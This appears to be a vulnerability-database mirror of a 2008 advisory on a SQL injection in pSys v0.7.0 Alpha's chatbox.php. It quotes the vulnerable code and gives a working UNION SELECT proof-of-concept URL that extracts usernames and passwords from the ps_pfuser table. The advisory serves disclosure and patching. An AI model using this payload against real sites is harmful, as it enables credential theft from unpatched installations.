Lucene search

psys070-sql.txt

🗓️ 01 Jul 2008 00:00:00Reported by DNXType

packetstorm🔗 packetstormsecurity.com👁 18 Views

pSys v0.7.0 Alpha chatbox.php Remote SQL Injection, Discovered 22.06.2008, Vendor: http://www.powie.de, Bug: $showid in chatbox.php near line 42

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

` \#'#/  
(-.-)  
---------------------oOO---(_)---OOo--------------------  
| pSys v0.7.0 Alpha (chatbox.php) Remote SQL Injection |  
| (works only with magic quotes = off) |  
| coded by DNX |  
--------------------------------------------------------  
[!] Discovered.: DNX  
[!] Vendor.....: http://www.powie.de  
[!] Detected...: 22.06.2008  
[!] Reported...: 23.06.2008  
[!] Response...: 23.06.2008  
  
[!] Background.: pSys is a module based PHP Script  
  
[!] Bug........: $showid in chatbox.php near line 42  
  
12: $showid = $_REQUEST['showid']; //Einzelne ID anzeigen  
  
41: if ($showid != '') {  
42: $sqlbefehl = "Select * FROM $tab_quick where id='$showid'";  
  
[!] PoC........: http://127.0.0.1/psys/chatbox.php?showid=' union select 1,username,pwd,4,5,6,7,8 FROM ps_pfuser/*  
  
"ps_" is default database prefix  
  
[!] Solution...: Install updates from cvs (http://www.powie.de/cvsout)  
  
[!] Greetingz..: h0yt3r, k1tk4t, pwndomina, e\o, daneo  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

01 Jul 2008 00:00Current

7.4High risk

Vulners AI Score7.4